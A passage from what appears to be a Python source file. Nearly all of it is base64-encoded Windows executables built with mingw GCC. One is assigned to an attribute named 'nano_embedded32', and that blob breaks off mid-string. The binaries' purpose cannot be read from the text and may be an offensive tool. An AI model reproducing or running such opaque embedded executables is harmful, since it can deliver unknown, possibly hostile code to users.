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QAAEEUBAFCRAADRkQAAGEUBAOCRAADjkQAAJEUBAPCRAADokgAAKEUBAPCSAADzkgAAQEUBAACTAABqkwAAREUBAHCTAADSlAAAUEUBAOCUAAAUmAAAXEUBACCYAABhmAAAdEUBAHCYAAB8mAAAfEUBAICYAAA6mgAAgEUBAECaAACrmgAAiEUBALCaAAAomwAAmEUBADCbAAC5mwAApEUBAMCbAACinAAArEUBALCcAADcnAAAtEUBAOCcAAAvnQAAuEUBADCdAADPnQAAvEUBANCdAABIngAAyEUBAFCeAACJngAAzEUBAJCeAAD7ngAA0EUBAACfAAA2nwAA1EUBAECfAADHnwAA2EUBANCfAACOoAAA3EUBANCgAAD3oAAA4EUBAAChAABHoQAA5EUBAFChAABBogAA8EUBAFCiAACnogAA+EUBALCiAAAIpAAAAEYBABCkAABApQAAFEYBAEClAACHpQAAIEYBAJClAAA9pgAALEYBAECmAABxqwAANEYBAICrAAAUrwAATEYBACCvAACAsAAAZEYBAICwAAAitAAAeEYBADC0AAAQtQAAiEYBABC1AACwtQAAlEYBALC1AACQtgAAoEYBAJC2AAAAuAAArEYBAAC4AAA6vAAAuEYBAEC8AABuxwAAzEYBAHDHAACnxwAA5EYBALDHAAAsyAAA7EYBADDIAABMyAAA+EYBAFDIAADGyQAA/EYBANDJAADX4AAAFEcBAODgAADV4QAAMEcBAODhAAAj4gAAQEcBADDiAAAM4wAAREcBABDjAABS4wAAUEcBAGDjAABS5AAAWEcBAGDkAADE5AAAZEcBANDkAAB95QAAbEcBAIDlAAA95gAAfEcBAEDmAACZ5wAAhEcBAKDnAACg6QAAnEcBAKDpAACu6gAAsEcBALDqAAAA6wAAxEcBAADrAADF7AAAyEcBANDsAADo7QAA2EcBAPDtAAD57gAA4EcBAADvAAAq7wAA7EcBADDvAABY7wAA8EcBAGDvAABr7wAA9EcBAHDvAAB77wAA+EcBAIDvAACL7wAA/EcBAJDvAAD37wAAAEgBAADwAABg8AAACEgBAGDwAABo8AAAEEgBAHDwAAB78AAAFEgBAIDwAACf8AAAGEgBAKDwAAAp8QAAIEgBADDxAABx8QAAKEgBAIDxAAB28gAANEgBAIDyAAD98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gEAAAAAAPKGAQAAAAAA+oYBAAAAAAAChwEAAAAAAAyHAQAAAAAAGocBAAAAAAAkhwEAAAAAADCHAQAAAAAAOocBAAAAAABEhwEAAAAAAE6HAQAAAAAAVocBAAAAAABghwEAAAAAAGiHAQAAAAAAdIcBAAAAAAB+hwEAAAAAAIiHAQAAAAAAkocBAAAAAACchwEAAAAAAKaHAQAAAAAAsocBAAAAAAC8hwEAAAAAAMaHAQAAAAAA0IcBAAAAAAAAAAAAAAAAABsBRGVsZXRlQ3JpdGljYWxTZWN0aW9uAD8BRW50ZXJDcml0aWNhbFNlY3Rpb24AAHYCR2V0TGFzdEVycm9yAADMAkdldFByb2Nlc3NIZWFwAADnAkdldFN0YXJ0dXBJbmZvQQBfA0hlYXBBbGxvYwBlA0hlYXBGcmVlAAB8A0luaXRpYWxpemVDcml0aWNhbFNlY3Rpb24AlwNJc0RCQ1NMZWFkQnl0ZUV4AADYA0xlYXZlQ3JpdGljYWxTZWN0aW9uAAAMBE11bHRpQnl0ZVRvV2lkZUNoYXIAcgVTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAggVTbGVlcAClBVRsc0dldFZhbHVlANQFVmlydHVhbFByb3RlY3QAANYFVmlydHVhbFF1ZXJ5AAALBldpZGVDaGFyVG9NdWx0aUJ5dGUAOABfX0Nfc3BlY2lmaWNfaGFuZGxlcgAAQABfX19sY19jb2RlcGFnZV9mdW5jAEMAX19fbWJfY3VyX21heF9mdW5jAABSAF9fZ2V0bWFpbmFyZ3MAUwBfX2luaXRlbnYAVABfX2lvYl9mdW5jAABhAF9fc2V0X2FwcF90eXBlAABjAF9fc2V0dXNlcm1hdGhlcnIAAHIAX2FjbWRsbgB5AF9hbXNnX2V4aXQAAIsAX2NleGl0AACXAF9jb21tb2RlAAC+AF9lcnJubwAA3ABfZm1vZGUAABsBX2luaXR0ZXJtAIEBX2xvY2sAJwJfb25leGl0ALICX3RpbWU2NADHAl91bmxvY2sACANfd2NzaWNtcAAAhQNhYm9ydACSA2F0b2kAAJYDY2FsbG9jAACjA2V4aXQAALcDZnByaW50ZgC5A2ZwdXRjAL4DZnJlZQAAywNmd3JpdGUAAPQDbG9jYWxlY29udgAA+gNtYWxsb2MAAP0DbWJzdG93Y3MAAAEEbWVtY21wAAACBG1lbWNweQAABARtZW1zZXQAABYEcmFuZAAAIgRzaWduYWwAACsEc3JhbmQANwRzdHJlcnJvcgAAOQRzdHJsZW4AADwEc3RybmNtcAA9BHN0cm5jcHkAQARzdHJyY2hyAEEEc3Ryc3BuAABeBHZmcHJpbnRmAAB4BHdjc2xlbgAAeQR3Y3NuY2F0AHwEd2NzbmNweQCDBHdjc3N0cgAAAAAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAEtFUk5FTDMyLmRsbAAAAAAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQBtc3ZjcnQuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMBEAQAEAAAAAAAAAAAAAAAAAAAAAAAAAEBAAQAEAAAAAAAAAAAAAAAAAAAAAAAAAUJEAQAEAAAAgkQBAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAADAAAAOinAAAAAAEAHAAAABCgcKCAoJCgoKCwoLigwKDIoNCgABABABQAAADgrACtCK0QrRitAAAAIAEARAAAAKCjsKPAo9Cj4KPwowCkEKQgpDCkQKRQpGCkcKSApJCkoKSwpMCk0KTgpPCkAKUQpSClMKVApVClYKUAAACQAQAQAAAACKAgoDigQKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\"\n )\n self.nano_embedded32 = base64.b64decode(\n \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEJAAAAAAAAOAEAAAAAAOAADgMLAQIlAN4AAAA0AQAAJAAAsBQAAAAQAAAA8AAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADAAQAABAAApyUCAAMAQAEAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAACAAQBcBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALABAJQHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADUDAEAGAAAAAAAAAAAAAAAAAAAAAAAAABcgQEAIAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAANNwAAAAQAAAA3gAAAAQAAAAAAAAAAAAAAAAAAGAAAGAuZGF0YQAAAMwAAAAA8AAAAAIAAADiAAAAAAAAAAAAAAAAAABAAADALnJkYXRhAAA4GQAAAAABAAAaAAAA5AAAAAAAAAAAAAAAAAAAQAAAQC80AAAAAAAAgCQAAAAgAQAAJgAAAP4AAAAAAAAAAAAAAAAAAEAAAEAuYnNzAAAAABQiAAAAUAEAAAAAAAAAAAAAAAAAAAAAAAAAA